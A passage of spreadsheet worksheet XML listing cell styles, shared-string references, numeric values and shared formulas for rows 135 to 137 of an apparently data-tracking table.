      <c r="KU135" s="127"/>
      <c r="KV135" s="127"/>
      <c r="KW135" s="127"/>
      <c r="KX135" s="127"/>
      <c r="KY135" s="127"/>
      <c r="KZ135" s="127"/>
      <c r="LA135" s="127"/>
      <c r="LB135" s="127"/>
      <c r="LC135" s="127"/>
      <c r="LD135" s="127"/>
      <c r="LE135" s="127"/>
      <c r="LF135" s="127"/>
      <c r="LG135" s="127"/>
      <c r="LH135" s="127"/>
      <c r="LI135" s="127"/>
      <c r="LJ135" s="127"/>
      <c r="LK135" s="127"/>
      <c r="LL135" s="127"/>
      <c r="LM135" s="127"/>
      <c r="LN135" s="127"/>
      <c r="LO135" s="127"/>
      <c r="LP135" s="127"/>
      <c r="LQ135" s="127"/>
      <c r="LR135" s="127"/>
      <c r="LS135" s="127"/>
      <c r="LT135" s="127"/>
      <c r="LU135" s="127"/>
      <c r="LV135" s="127"/>
      <c r="LW135" s="127"/>
      <c r="LX135" s="127"/>
      <c r="LY135" s="127"/>
      <c r="LZ135" s="127"/>
      <c r="MA135" s="127"/>
      <c r="MB135" s="127"/>
      <c r="MC135" s="127"/>
      <c r="MD135" s="127"/>
      <c r="ME135" s="127"/>
      <c r="MF135" s="127"/>
      <c r="MG135" s="127"/>
      <c r="MH135" s="127"/>
      <c r="MI135" s="127"/>
      <c r="MJ135" s="127"/>
      <c r="MK135" s="127"/>
      <c r="ML135" s="127"/>
      <c r="MM135" s="127"/>
      <c r="MN135" s="127"/>
      <c r="MO135" s="127"/>
      <c r="MP135" s="127"/>
      <c r="MQ135" s="127"/>
      <c r="MR135" s="127"/>
      <c r="MS135" s="127"/>
      <c r="MT135" s="127"/>
      <c r="MU135" s="127"/>
      <c r="MV135" s="127"/>
      <c r="MW135" s="127"/>
      <c r="MX135" s="127"/>
      <c r="MY135" s="127"/>
      <c r="MZ135" s="127"/>
      <c r="NA135" s="127"/>
      <c r="NB135" s="127"/>
      <c r="NC135" s="127"/>
      <c r="ND135" s="127"/>
      <c r="NE135" s="127"/>
      <c r="NF135" s="127"/>
      <c r="NG135" s="127"/>
      <c r="NH135" s="127"/>
      <c r="NI135" s="127"/>
      <c r="NJ135" s="127"/>
      <c r="NK135" s="127"/>
      <c r="NL135" s="127"/>
      <c r="NM135" s="127"/>
      <c r="NN135" s="127"/>
      <c r="NO135" s="127"/>
      <c r="NP135" s="127"/>
      <c r="NQ135" s="127"/>
      <c r="NR135" s="127"/>
      <c r="NS135" s="127"/>
      <c r="NT135" s="127"/>
      <c r="NU135" s="127"/>
      <c r="NV135" s="127"/>
      <c r="NW135" s="127"/>
      <c r="NX135" s="127"/>
      <c r="NY135" s="127"/>
    </row>
    <row r="136" ht="153.75" customHeight="1">
      <c r="A136" s="173"/>
      <c r="B136" s="89" t="s">
        <v>310</v>
      </c>
      <c r="C136" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D136" s="90" t="s">
        <v>311</v>
      </c>
      <c r="E136" s="90" t="s">
        <v>2289</v>
      </c>
      <c r="F136" s="90" t="s">
        <v>2290</v>
      </c>
      <c r="G136" s="91" t="s">
        <v>12</v>
      </c>
      <c r="H136" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I136" s="92" t="s">
        <v>2291</v>
      </c>
      <c r="J136" s="92" t="s">
        <v>917</v>
      </c>
      <c r="K136" s="92" t="s">
        <v>2292</v>
      </c>
      <c r="L136" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M136" s="93">
        <v>58.0</v>
      </c>
      <c r="N136" s="93">
        <v>41.0</v>
      </c>
      <c r="O136" s="93">
        <v>0.0</v>
      </c>
      <c r="P136" s="93">
        <v>41.0</v>
      </c>
      <c r="Q136" s="93">
        <f t="shared" si="204"/>
        <v>41</v>
      </c>
      <c r="R136" s="93">
        <v>41.0</v>
      </c>
      <c r="S136" s="93">
        <v>0.0</v>
      </c>
      <c r="T136" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U136" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V136" s="96" t="s">
        <v>1402</v>
      </c>
      <c r="W136" s="96" t="s">
        <v>2293</v>
      </c>
      <c r="X136" s="132" t="s">
        <v>2294</v>
      </c>
      <c r="Y136" s="126" t="s">
        <v>2295</v>
      </c>
      <c r="Z136" s="132" t="s">
        <v>2296</v>
      </c>
      <c r="AA136" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB136" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC136" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD136" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE136" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF136" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG136" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH136" s="99" t="s">
        <v>2297</v>
      </c>
      <c r="AI136" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ136" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK136" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL136" s="100">
        <v>0.0</v>
      </c>
      <c r="AM136" s="100">
        <v>0.0</v>
      </c>
      <c r="AN136" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO136" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP136" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ136" s="100">
        <v>0.0</v>
      </c>
      <c r="AR136" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS136" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT136" s="100" t="str">
        <f t="shared" si="227"/>
        <v>-</v>
      </c>
      <c r="AU136" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV136" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW136" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX136" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY136" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ136" s="100">
        <v>0.0</v>
      </c>
      <c r="BA136" s="102">
        <v>58.0</v>
      </c>
      <c r="BB136" s="102">
        <v>0.0</v>
      </c>
      <c r="BC136" s="102">
        <v>0.0</v>
      </c>
      <c r="BD136" s="102">
        <v>0.0</v>
      </c>
      <c r="BE136" s="102">
        <v>0.0</v>
      </c>
      <c r="BF136" s="102">
        <v>0.0</v>
      </c>
      <c r="BG136" s="102">
        <v>0.0</v>
      </c>
      <c r="BH136" s="102">
        <v>0.0</v>
      </c>
      <c r="BI136" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ136" s="102">
        <v>0.0</v>
      </c>
      <c r="BK136" s="102">
        <v>0.0</v>
      </c>
      <c r="BL136" s="103">
        <f t="shared" si="167"/>
        <v>0</v>
      </c>
      <c r="BM136" s="103">
        <f t="shared" si="168"/>
        <v>0</v>
      </c>
      <c r="BN136" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO136" s="103">
        <f t="shared" si="170"/>
        <v>0</v>
      </c>
      <c r="BP136" s="103">
        <f t="shared" si="171"/>
        <v>0</v>
      </c>
      <c r="BQ136" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR136" s="103">
        <f t="shared" si="173"/>
        <v>0</v>
      </c>
      <c r="BS136" s="103">
        <f t="shared" si="174"/>
        <v>0</v>
      </c>
      <c r="BT136" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU136" s="103">
        <f t="shared" si="217"/>
        <v>0</v>
      </c>
      <c r="BV136" s="103">
        <f t="shared" si="218"/>
        <v>0</v>
      </c>
      <c r="BW136" s="104" t="s">
        <v>12</v>
      </c>
      <c r="BX136" s="104">
        <v>0.0</v>
      </c>
      <c r="BY136" s="104">
        <v>0.0</v>
      </c>
      <c r="BZ136" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA136" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB136" s="104">
        <v>0.0</v>
      </c>
      <c r="CC136" s="104">
        <v>0.0</v>
      </c>
      <c r="CD136" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CE136" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF136" s="104" t="str">
        <f t="shared" si="215"/>
        <v>-</v>
      </c>
      <c r="CG136" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH136" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CI136" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ136" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK136" s="104">
        <v>0.0</v>
      </c>
      <c r="CL136" s="104">
        <v>0.0</v>
      </c>
      <c r="CM136" s="105">
        <v>56.0</v>
      </c>
      <c r="CN136" s="105">
        <v>0.0</v>
      </c>
      <c r="CO136" s="105">
        <v>0.0</v>
      </c>
      <c r="CP136" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ136" s="105">
        <v>0.0</v>
      </c>
      <c r="CR136" s="105">
        <v>0.0</v>
      </c>
      <c r="CS136" s="105">
        <v>0.0</v>
      </c>
      <c r="CT136" s="105">
        <v>0.0</v>
      </c>
      <c r="CU136" s="105">
        <v>0.0</v>
      </c>
      <c r="CV136" s="105">
        <v>0.0</v>
      </c>
      <c r="CW136" s="105">
        <v>0.0</v>
      </c>
      <c r="CX136" s="105">
        <v>0.0</v>
      </c>
      <c r="CY136" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ136" s="105">
        <v>0.0</v>
      </c>
      <c r="DA136" s="105">
        <v>0.0</v>
      </c>
      <c r="DB136" s="106">
        <f t="shared" si="176"/>
        <v>0</v>
      </c>
      <c r="DC136" s="106">
        <f t="shared" si="177"/>
        <v>0</v>
      </c>
      <c r="DD136" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE136" s="106">
        <f t="shared" si="179"/>
        <v>0</v>
      </c>
      <c r="DF136" s="106">
        <f t="shared" si="180"/>
        <v>0</v>
      </c>
      <c r="DG136" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH136" s="106">
        <f t="shared" si="181"/>
        <v>0</v>
      </c>
      <c r="DI136" s="106">
        <f t="shared" si="182"/>
        <v>0</v>
      </c>
      <c r="DJ136" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK136" s="107">
        <f t="shared" si="219"/>
        <v>0</v>
      </c>
      <c r="DL136" s="106">
        <f t="shared" si="220"/>
        <v>0</v>
      </c>
      <c r="DM136" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN136" s="108">
        <v>0.0</v>
      </c>
      <c r="DO136" s="108">
        <v>0.0</v>
      </c>
      <c r="DP136" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ136" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR136" s="108">
        <v>0.0</v>
      </c>
      <c r="DS136" s="108">
        <v>0.0</v>
      </c>
      <c r="DT136" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU136" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV136" s="108" t="str">
        <f t="shared" si="221"/>
        <v>-</v>
      </c>
      <c r="DW136" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX136" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY136" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ136" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA136" s="108">
        <v>0.0</v>
      </c>
      <c r="EB136" s="108">
        <v>0.0</v>
      </c>
      <c r="EC136" s="109">
        <v>58.0</v>
      </c>
      <c r="ED136" s="109">
        <v>0.0</v>
      </c>
      <c r="EE136" s="109">
        <v>0.0</v>
      </c>
      <c r="EF136" s="109">
        <v>0.0</v>
      </c>
      <c r="EG136" s="109">
        <v>0.0</v>
      </c>
      <c r="EH136" s="109">
        <v>0.0</v>
      </c>
      <c r="EI136" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ136" s="109">
        <v>0.0</v>
      </c>
      <c r="EK136" s="109">
        <v>0.0</v>
      </c>
      <c r="EL136" s="109">
        <v>0.0</v>
      </c>
      <c r="EM136" s="109">
        <v>0.0</v>
      </c>
      <c r="EN136" s="109">
        <v>0.0</v>
      </c>
      <c r="EO136" s="109">
        <v>0.0</v>
      </c>
      <c r="EP136" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ136" s="109">
        <v>0.0</v>
      </c>
      <c r="ER136" s="110">
        <f t="shared" si="184"/>
        <v>0</v>
      </c>
      <c r="ES136" s="110">
        <f t="shared" si="185"/>
        <v>0</v>
      </c>
      <c r="ET136" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU136" s="110">
        <f t="shared" si="187"/>
        <v>0</v>
      </c>
      <c r="EV136" s="110">
        <f t="shared" si="188"/>
        <v>0</v>
      </c>
      <c r="EW136" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX136" s="110">
        <f t="shared" si="190"/>
        <v>0</v>
      </c>
      <c r="EY136" s="110">
        <f t="shared" si="191"/>
        <v>0</v>
      </c>
      <c r="EZ136" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA136" s="110">
        <f t="shared" si="222"/>
        <v>0</v>
      </c>
      <c r="FB136" s="110">
        <f t="shared" si="223"/>
        <v>0</v>
      </c>
      <c r="FC136" s="111" t="s">
        <v>2298</v>
      </c>
      <c r="FD136" s="111">
        <v>3.0</v>
      </c>
      <c r="FE136" s="111">
        <v>8.0</v>
      </c>
      <c r="FF136" s="101" t="s">
        <v>2298</v>
      </c>
      <c r="FG136" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FH136" s="111">
        <v>0.0</v>
      </c>
      <c r="FI136" s="111">
        <v>0.0</v>
      </c>
      <c r="FJ136" s="111" t="s">
        <v>2298</v>
      </c>
      <c r="FK136" s="111" t="s">
        <v>2298</v>
      </c>
      <c r="FL136" s="111" t="str">
        <f t="shared" si="216"/>
        <v>2002749, 2002752, 2101620</v>
      </c>
      <c r="FM136" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN136" s="111" t="s">
        <v>2298</v>
      </c>
      <c r="FO136" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP136" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ136" s="111">
        <v>0.0</v>
      </c>
      <c r="FR136" s="111">
        <v>0.0</v>
      </c>
      <c r="FS136" s="112">
        <v>56.0</v>
      </c>
      <c r="FT136" s="112">
        <v>3.0</v>
      </c>
      <c r="FU136" s="112">
        <v>4.0</v>
      </c>
      <c r="FV136" s="112">
        <v>0.0</v>
      </c>
      <c r="FW136" s="112">
        <v>8.0</v>
      </c>
      <c r="FX136" s="112">
        <v>8.0</v>
      </c>
      <c r="FY136" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ136" s="112">
        <v>0.0</v>
      </c>
      <c r="GA136" s="112">
        <v>0.0</v>
      </c>
      <c r="GB136" s="112">
        <v>0.0</v>
      </c>
      <c r="GC136" s="112">
        <v>0.0</v>
      </c>
      <c r="GD136" s="112">
        <v>0.0</v>
      </c>
      <c r="GE136" s="112">
        <v>0.0</v>
      </c>
      <c r="GF136" s="112">
        <v>0.0</v>
      </c>
      <c r="GG136" s="112">
        <v>0.0</v>
      </c>
      <c r="GH136" s="113">
        <f t="shared" si="193"/>
        <v>0.07317073171</v>
      </c>
      <c r="GI136" s="113">
        <f t="shared" si="194"/>
        <v>0</v>
      </c>
      <c r="GJ136" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK136" s="113">
        <f t="shared" si="196"/>
        <v>0.09756097561</v>
      </c>
      <c r="GL136" s="113">
        <f t="shared" si="197"/>
        <v>0</v>
      </c>
      <c r="GM136" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN136" s="113">
        <f t="shared" si="199"/>
        <v>0.1951219512</v>
      </c>
      <c r="GO136" s="113">
        <f t="shared" si="200"/>
        <v>0</v>
      </c>
      <c r="GP136" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ136" s="114">
        <f t="shared" si="224"/>
        <v>0</v>
      </c>
      <c r="GR136" s="113">
        <f t="shared" si="225"/>
        <v>0</v>
      </c>
      <c r="GS136" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT136" s="94" t="s">
        <v>2299</v>
      </c>
      <c r="GU136" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV136" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW136" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX136" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY136" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ136" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA136" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB136" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC136" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD136" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE136" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF136" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG136" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH136" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI136" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ136" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK136" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL136" s="93">
        <v>70.0</v>
      </c>
      <c r="HM136" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN136" s="93">
        <v>0.0</v>
      </c>
      <c r="HO136" s="93">
        <v>0.0</v>
      </c>
      <c r="HP136" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ136" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR136" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS136" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT136" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU136" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV136" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW136" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX136" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY136" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ136" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA136" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB136" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC136" s="120" t="str">
        <f t="shared" ref="IC136:IC137" si="228">HV136</f>
        <v>-</v>
      </c>
      <c r="ID136" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE136" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF136" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG136" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH136" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II136" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ136" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK136" s="99">
        <v>41.0</v>
      </c>
      <c r="IL136" s="99">
        <v>0.0</v>
      </c>
      <c r="IM136" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN136" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO136" s="98">
        <v>0.0</v>
      </c>
      <c r="IP136" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ136" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR136" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS136" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT136" s="127"/>
      <c r="IU136" s="127"/>
      <c r="IV136" s="127"/>
      <c r="IW136" s="127"/>
      <c r="IX136" s="127"/>
      <c r="IY136" s="127"/>
      <c r="IZ136" s="127"/>
      <c r="JA136" s="127"/>
      <c r="JB136" s="127"/>
      <c r="JC136" s="127"/>
      <c r="JD136" s="127"/>
      <c r="JE136" s="127"/>
      <c r="JF136" s="127"/>
      <c r="JG136" s="127"/>
      <c r="JH136" s="127"/>
      <c r="JI136" s="127"/>
      <c r="JJ136" s="127"/>
      <c r="JK136" s="127"/>
      <c r="JL136" s="127"/>
      <c r="JM136" s="127"/>
      <c r="JN136" s="127"/>
      <c r="JO136" s="127"/>
      <c r="JP136" s="127"/>
      <c r="JQ136" s="127"/>
      <c r="JR136" s="127"/>
      <c r="JS136" s="127"/>
      <c r="JT136" s="127"/>
      <c r="JU136" s="127"/>
      <c r="JV136" s="127"/>
      <c r="JW136" s="127"/>
      <c r="JX136" s="127"/>
      <c r="JY136" s="127"/>
      <c r="JZ136" s="127"/>
      <c r="KA136" s="127"/>
      <c r="KB136" s="127"/>
      <c r="KC136" s="127"/>
      <c r="KD136" s="127"/>
      <c r="KE136" s="127"/>
      <c r="KF136" s="127"/>
      <c r="KG136" s="127"/>
      <c r="KH136" s="127"/>
      <c r="KI136" s="127"/>
      <c r="KJ136" s="127"/>
      <c r="KK136" s="127"/>
      <c r="KL136" s="127"/>
      <c r="KM136" s="127"/>
      <c r="KN136" s="127"/>
      <c r="KO136" s="127"/>
      <c r="KP136" s="127"/>
      <c r="KQ136" s="127"/>
      <c r="KR136" s="127"/>
      <c r="KS136" s="127"/>
      <c r="KT136" s="127"/>
      <c r="KU136" s="127"/>
      <c r="KV136" s="127"/>
      <c r="KW136" s="127"/>
      <c r="KX136" s="127"/>
      <c r="KY136" s="127"/>
      <c r="KZ136" s="127"/>
      <c r="LA136" s="127"/>
      <c r="LB136" s="127"/>
      <c r="LC136" s="127"/>
      <c r="LD136" s="127"/>
      <c r="LE136" s="127"/>
      <c r="LF136" s="127"/>
      <c r="LG136" s="127"/>
      <c r="LH136" s="127"/>
      <c r="LI136" s="127"/>
      <c r="LJ136" s="127"/>
      <c r="LK136" s="127"/>
      <c r="LL136" s="127"/>
      <c r="LM136" s="127"/>
      <c r="LN136" s="127"/>
      <c r="LO136" s="127"/>
      <c r="LP136" s="127"/>
      <c r="LQ136" s="127"/>
      <c r="LR136" s="127"/>
      <c r="LS136" s="127"/>
      <c r="LT136" s="127"/>
      <c r="LU136" s="127"/>
      <c r="LV136" s="127"/>
      <c r="LW136" s="127"/>
      <c r="LX136" s="127"/>
      <c r="LY136" s="127"/>
      <c r="LZ136" s="127"/>
      <c r="MA136" s="127"/>
      <c r="MB136" s="127"/>
      <c r="MC136" s="127"/>
      <c r="MD136" s="127"/>
      <c r="ME136" s="127"/>
      <c r="MF136" s="127"/>
      <c r="MG136" s="127"/>
      <c r="MH136" s="127"/>
      <c r="MI136" s="127"/>
      <c r="MJ136" s="127"/>
      <c r="MK136" s="127"/>
      <c r="ML136" s="127"/>
      <c r="MM136" s="127"/>
      <c r="MN136" s="127"/>
      <c r="MO136" s="127"/>
      <c r="MP136" s="127"/>
      <c r="MQ136" s="127"/>
      <c r="MR136" s="127"/>
      <c r="MS136" s="127"/>
      <c r="MT136" s="127"/>
      <c r="MU136" s="127"/>
      <c r="MV136" s="127"/>
      <c r="MW136" s="127"/>
      <c r="MX136" s="127"/>
      <c r="MY136" s="127"/>
      <c r="MZ136" s="127"/>
      <c r="NA136" s="127"/>
      <c r="NB136" s="127"/>
      <c r="NC136" s="127"/>
      <c r="ND136" s="127"/>
      <c r="NE136" s="127"/>
      <c r="NF136" s="127"/>
      <c r="NG136" s="127"/>
      <c r="NH136" s="127"/>
      <c r="NI136" s="127"/>
      <c r="NJ136" s="127"/>
      <c r="NK136" s="127"/>
      <c r="NL136" s="127"/>
      <c r="NM136" s="127"/>
      <c r="NN136" s="127"/>
      <c r="NO136" s="127"/>
      <c r="NP136" s="127"/>
      <c r="NQ136" s="127"/>
      <c r="NR136" s="127"/>
      <c r="NS136" s="127"/>
      <c r="NT136" s="127"/>
      <c r="NU136" s="127"/>
      <c r="NV136" s="127"/>
      <c r="NW136" s="127"/>
      <c r="NX136" s="127"/>
      <c r="NY136" s="127"/>
    </row>
    <row r="137" ht="153.75" customHeight="1">
      <c r="A137" s="173"/>
      <c r="B137" s="146" t="s">
        <v>951</v>
      </c>
      <c r="C137" s="90" t="s">
        <v>209</v>
      </c>
      <c r="D137" s="90" t="s">
        <v>952</v>
      </c>
      <c r="E137" s="90" t="s">
        <v>2300</v>
      </c>
      <c r="F137" s="90" t="s">
        <v>2301</v>
      </c>
      <c r="G137" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H137" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I137" s="92" t="s">
        <v>2302</v>
      </c>
      <c r="J137" s="92" t="s">
        <v>448</v>
      </c>
      <c r="K137" s="92" t="s">
        <v>2303</v>
      </c>
      <c r="L137" s="93" t="s">
        <v>1541</v>
      </c>
      <c r="M137" s="93">
        <v>12.0</v>
      </c>
      <c r="N137" s="93">
        <v>1.0</v>
      </c>
      <c r="O137" s="93">
        <v>0.0</v>
      </c>
      <c r="P137" s="93">
        <v>1.0</v>
      </c>
      <c r="Q137" s="93">
        <f t="shared" si="204"/>
        <v>1</v>
      </c>
      <c r="R137" s="93">
        <v>1.0</v>
      </c>
      <c r="S137" s="93">
        <v>0.0</v>
      </c>
      <c r="T137" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U137" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V137" s="96" t="s">
        <v>2304</v>
      </c>
      <c r="W137" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X137" s="97" t="s">
        <v>2305</v>
      </c>
      <c r="Y137" s="96" t="s">
        <v>2306</v>
      </c>
      <c r="Z137" s="132" t="s">
        <v>2307</v>
      </c>
      <c r="AA137" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB137" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC137" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD137" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE137" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF137" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG137" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH137" s="99" t="s">
        <v>2308</v>
      </c>
      <c r="AI137" s="99" t="s">
        <v>481</v>
      </c>
      <c r="AJ137" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK137" s="100">
        <v>399.0</v>
      </c>
      <c r="AL137" s="100">
        <v>1.0</v>
      </c>
      <c r="AM137" s="100">
        <v>4.0</v>
      </c>
      <c r="AN137" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO137" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP137" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ137" s="100">
        <v>4.0</v>
      </c>
      <c r="AR137" s="100">
        <v>399.0</v>
      </c>
      <c r="AS137" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT137" s="100">
        <f t="shared" si="227"/>
        <v>399</v>
      </c>
      <c r="AU137" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV137" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW137" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX137" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY137" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ137" s="100">
        <v>0.0</v>
      </c>
      <c r="BA137" s="102">
        <v>12.0</v>
      </c>
      <c r="BB137" s="102">
        <v>4.0</v>
      </c>
      <c r="BC137" s="102">
        <v>4.0</v>
      </c>
      <c r="BD137" s="102">
        <v>4.0</v>
      </c>
      <c r="BE137" s="102">
        <v>0.0</v>
      </c>
      <c r="BF137" s="102">
        <v>0.0</v>
      </c>
      <c r="BG137" s="102">
        <v>0.0</v>
      </c>
      <c r="BH137" s="102">
        <v>0.0</v>
      </c>
      <c r="BI137" s="102">
        <v>4.0</v>
      </c>
      <c r="BJ137" s="102">
        <v>4.0</v>
      </c>
      <c r="BK137" s="102">
        <v>4.0</v>
      </c>
      <c r="BL137" s="103">
        <f t="shared" si="167"/>
        <v>4</v>
      </c>
      <c r="BM137" s="103">
        <f t="shared" si="168"/>
        <v>4</v>
      </c>
      <c r="BN137" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO137" s="103">
        <f t="shared" si="170"/>
        <v>4</v>
      </c>
      <c r="BP137" s="103">
        <f t="shared" si="171"/>
        <v>4</v>
      </c>
      <c r="BQ137" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR137" s="103">
        <f t="shared" si="173"/>
        <v>4</v>
      </c>
      <c r="BS137" s="103">
        <f t="shared" si="174"/>
        <v>4</v>
      </c>
      <c r="BT137" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU137" s="103">
        <f t="shared" si="217"/>
        <v>0</v>
      </c>
      <c r="BV137" s="103">
        <f t="shared" si="218"/>
        <v>0</v>
      </c>
      <c r="BW137" s="104">
        <v>399.0</v>
      </c>
      <c r="BX137" s="104">
        <v>1.0</v>
      </c>
      <c r="BY137" s="104">
        <v>4.0</v>
      </c>
      <c r="BZ137" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA137" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CB137" s="104">
        <v>1.0</v>
      </c>
      <c r="CC137" s="104">
        <v>4.0</v>
      </c>
      <c r="CD137" s="104">
        <v>399.0</v>
      </c>
      <c r="CE137" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF137" s="104">
        <f t="shared" si="215"/>
        <v>399</v>
      </c>
